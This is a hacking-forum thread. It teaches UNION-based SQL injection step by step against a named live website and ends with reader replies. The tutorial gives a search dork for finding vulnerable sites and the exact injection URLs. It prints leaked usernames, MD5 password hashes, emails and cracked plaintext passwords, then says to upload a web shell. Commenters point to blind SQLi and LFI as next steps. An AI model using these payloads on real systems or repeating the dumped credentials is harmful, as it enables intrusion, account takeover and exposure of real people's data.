[U_!!v!!_N]

Aslam 0 alaikum
What we are going to learn today is what we called UNION Based SQL injection

First you want to find the Valun site using sql dorks
like this
"inurl:index.php/id="
Step1: Finding the vulnerability in a website
many links likes that
http://www.fundraisingnetwork.info/artca....php?id=22

so you put string at the last (')

the link become
http://www.fundraisingnetwork.info/artca....php?id=22'

You get the error then the site is valun the link i provided is valun

Step2: Finding the number of columns a website has
now we need to find the number of columns by adding at the end of the link
order by x-- *where 'x' is random integer
so the link become like this
http://www.fundraisingnetwork.info/artca....php?id=22 order by 1--no error
http://www.fundraisingnetwork.info/artca....php?id=22 order by 2-- no error
http://www.fundraisingnetwork.info/artca....php?id=22 order by 8--no error
and so on
We increace the number untill we get the error

http://www.fundraisingnetwork.info/artca....php?id=22 order by 9--

Here we get the error so now we know that the number of columns are 8

Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement

If we perform the UNION SELECT statement, we can get both users and admin information from their database
The point is that, UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use UNION SELECT
If you want to find version of database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about the Union function, lets continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like.

http://www.fundraisingnetwork.info/artca....php?id=22 UNION SELECT 1,2,3,4,5,6,7,8--


This is what you would normally do if you use UNION function while SQL injecting a website

Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,5,6,7,8--


Step4: Random numbers appear on screen, the next step

Here you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.

In my given site you saw 5 and 7
You need to inject the number at the very top (always at the very top)
So, in this case we have number "5"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.

Replace the vulnerable column i.e number 5 with a statement

group_concat(CHAR(32,58,32),user(),database(),version())

user() = find the user information
version() = find the version of the database
database() = find the current database

link becomes like

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

tfnprimary2012@184.168.27.57 : tfnprimary2012 : 5.0.96-log
user()=tfnprimary2012@184.168.27.57
database()=tfnprimary2012
version()=5.0.96-log

So the database version is 5, which is good because it'll be easier to SQL inject the website.
Note:
Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

If you ever want to SQLi a website with version <5, then you can guess the tables with the following below

Code:

user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin

We have almost every information we have about the website
Look close here, we used a command "group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5

Step5:Getting the table names

Alright, first lets look up some functions we're gonna use to extract table names (Important)
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

In here, we replaced our vulnerable column with "group_concat(table_name)"
and then we added a
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:

content_art_articles,content_art_authors,content_art_categories,content_art_listings_spon,content_art_rotations,core_categories,core_listings_free,core_listings_spon,membership_grouppermissions,membership_groups,membership_userpermissions,membership_userrecords,membership_users,salesleads,salesleads_comm,salesleads_infotypes,salesleads_list

Alright now that we've found the tables, what you're gonna have to do is
that, you have to find tables where user/admin information are stored
In this case, "membership_users" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace
"(table_name)" with "(column_name)"
&
"from information_schema.tables where table_schema=database()--" with
"from information_schema.columns where table_name=membership_users--"

If nothing happens then convert the 'membership_users' to HEX
using
http://www.swingnote.com/tools/texttohex.php

membership_users=6d656d626572736869705f7573657273

rember to add 0x before 6d656d626572736869705f7573657273

so the link become

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x6d656d626572736869705f7573657273--

the data form tables are as

memberID,passMD5,email,signupDate,groupID,isBanned,isApproved,custom1,custom2,custom3,custom4,comments

we need only
memberID,passMD5,email

Step6:Getting Data from Columns

Alright, lets extract the information
Look closely at the syntax:

http://www.fundraisingnetwork.info/artca...php?id=-22 UNION SELECT 1,2,3,4,group_concat(memberID,0x3a,passMD5,0x3a,email,0x3a),6,7,8 from membership_users--


Keep this formula-like syntax in your mind whenever you want to extract data from columns
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--

Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )

column names = (memberID,passMD5,email)
separator = 0x3a (a hex for a colon " : ")
table name = membership_users
Once you execute that syntax, you get the username and password separated by a colon

Results after executing the syntax:


spradmin:48162419062b67c10a27752e4706d933upport@fundraisingnetwork.org
mp8s4hz5:48162419062b67c10a27752e4706d933upport@fundraisingnetwork.org
43449928:16c03ee03a4a7060c40e98dad78b34a2:jolian@justfundraising.com
783185498:1901151906d22575c80feda185f6c537ervice@easyfundraisingcards.com
admin:48162419062b67c10a27752e4706d933upport

Bingo we got the admin login details

now crack the MD5 hash by
http://www.md5decrypter.co.uk/
we found that
48162419062b67c10a27752e4706d933 MD5: xZver5n3
48162419062b67c10a27752e4706d933 MD5: xZver5n3
48162419062b67c10a27752e4706d933 MD5: xZver5n3
16c03ee03a4a7060c40e98dad78b34a2 MD5: justfund
1901151906d22575c80feda185f6c537 MD5: nw8YcxP


Now find the admin login and upload the shell and Bingo

Any qustions relating to this tut feel free to ask

Regards :
U_!!v!!_N

[Charon]

Nice tutorial, also you might want to add these are the basics because not all SQLi vuln websites will work to this, but more SQLi advanced methods will do.

[U_!!v!!_N]

yes bro . soon advanced tut i will post with example

[jpjp333]

ty for the guide, well put together

[fieldy2012]

thanks for this great tutorial.

[U_!!v!!_N]

Thanks for your feed back fieldy2012 bro

[jpjp333]

sorry for the noob question but is there any way around it if you don't get the SQL error in the first step?

[Charon]

sorry for the noob question but is there any way around it if you don't get the SQL error in the first step?

Yes, but these are advanced you can try if it's vulnerable to a blind SQLi injection or perhaps its vulnerable to any other injection like LFI.

:blackhat:

[U_!!v!!_N]

Then move to other use different dorks available in this forum any queries

[jpjp333]

sorry for the noob question but is there any way around it if you don't get the SQL error in the first step?

Yes, but these are advanced you can try if it's vulnerable to a blind SQLi injection or perhaps its vulnerable to any other injection like LFI.

:blackhat:

ah, thanks